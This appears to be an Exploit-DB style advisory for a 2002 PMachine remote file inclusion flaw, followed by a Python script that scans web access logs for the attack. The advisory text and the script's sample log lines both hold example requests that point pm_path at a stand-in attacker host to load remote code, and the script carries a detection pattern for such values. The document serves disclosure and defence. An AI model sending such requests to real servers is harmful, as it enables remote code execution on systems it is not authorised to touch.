Vendor: PMachine
By: SecurityFocus
CVSS: 7.5 (HIGH)
Remote Command Execution
CWE: 94
Product Name: PMachine
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

PMachine Remote Command Execution Vulnerability

It has been reported that PMachine does not properly handle include files under some circumstances. Because of this, an attacker may be able to remotely execute commands. An attacker can send a malicious request to the vulnerable server that points the pm_path parameter at a remote host. Two example requests:

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=.txt with the attacker's file at http://attacker.example.com/config.txt

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt with the attacker's file at http://attacker.example.com/config/badcode.txt

Either request can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Upgrade to the latest version of PMachine, which is not vulnerable to this issue.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7919/info

It has been reported that PMachine does not properly handle include files under some circumstances. Because of this, an attacker may be able to remotely execute commands.

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=.txt with:

http://attacker.example.com/config.txt

or

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt with:

http://attacker.example.com/config/badcode.txt
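
A log check for the request pattern shown above, added here as an example (it is not code from PMachine or from the original advisory). It assumes combined-format web access logs and infers from the two requests on this page that the script loads pm_path + "config" + sfx; the function name and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A URL scheme or stream wrapper at the start of the value (http://, ftp://, php://, data:).
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:)', re.IGNORECASE)


def find_remote_includes(lines):
    """Return (line_number, pm_path, expected_fetch) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if not target.path.lower().endswith("/lib.inc.php"):
            continue
        # parse_qs percent-decodes, so encoded variants are caught as well.
        params = parse_qs(target.query, keep_blank_values=True)
        for pm_path in params.get("pm_path", []):
            if REMOTE_RE.match(pm_path):
                sfx = params.get("sfx", [""])[0]
                # Assumption from the page's examples: the include target is
                # pm_path + "config" + sfx. Look for this URL in egress logs.
                hits.append((number, pm_path, pm_path + "config" + sfx))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /pm/index.php HTTP/1.0" 200 5120',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /pm/lib.inc.php'
    '?pm_path=http://attacker.example.com/&sfx=.txt HTTP/1.0" 200 312',
    '192.0.2.77 - - [01/Jan/2024:10:00:09 +0000] "GET /pm/lib.inc.php'
    '?pm_path=http%3A%2F%2Fattacker.example.com%2F&sfx=%2Fbadcode.txt HTTP/1.0" 200 298',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /pm/lib.inc.php?pm_path=./pm/ HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for number, pm_path, fetch in find_remote_includes(SAMPLE_LOG):
        print(f"line {number}: pm_path={pm_path!r} -> expect outbound fetch of {fetch}")
```

A hit means the request was attempted, not that the include succeeded; correlating the reconstructed URL with outbound proxy or firewall logs shows whether the server actually fetched it.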